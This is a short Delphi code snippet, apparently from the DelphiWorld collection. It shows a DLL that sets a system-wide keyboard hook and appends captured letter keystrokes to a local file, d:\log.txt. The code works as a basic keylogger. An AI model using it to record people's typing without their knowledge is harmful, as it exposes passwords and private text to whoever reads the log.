Глобальный хук на клавиатуру
library Hook; uses Windows, SysUtils; const KF_UP_MY = $40000000; var CurrentHook: HHook; KeyArray: array[0..19] of char; KeyArrayPtr: integer; CurFile:text; function GlobalKeyBoardHook(code: integer; wParam: integer; lParam: integer): longword; stdcall; var i:integer; begin if code< 0 then begin result:=CallNextHookEx(CurrentHook,code,wParam,lparam); Exit; end; if ( (lParam and KF_UP_MY ) = 0) and (wParam> =65) and (wParam< =90) then begin KeyArray[KeyArrayPtr]:=char(wParam); KeyArrayPtr:=KeyArrayPtr+1; if KeyArrayPtr> 19 then begin for i:=0 to 19 do begin Assignfile(CurFile,'d:\log.txt'); if fileexists('d:\log.txt')=false then rewrite(CurFile) else Append(CurFile); write(Curfile, KeyArray[i]); closefile(curfile); end; KeyArrayPtr:=0; end; end; CallNextHookEx(CurrentHook,code,wParam,lparam); result:=0; end; procedure SetupGlobalKeyBoardHook; begin CurrentHook:=SetWindowsHookEx(WH_KEYBOARD, @GlobalKeyBoardHook,HInstance, 0); KeyArrayptr:=0; end; procedure unhook; begin UnhookWindowshookEx(CurrentHook); end; exports SetupGlobalKeyBoardHook, UnHook; begin end.
DelphiWorld 6.0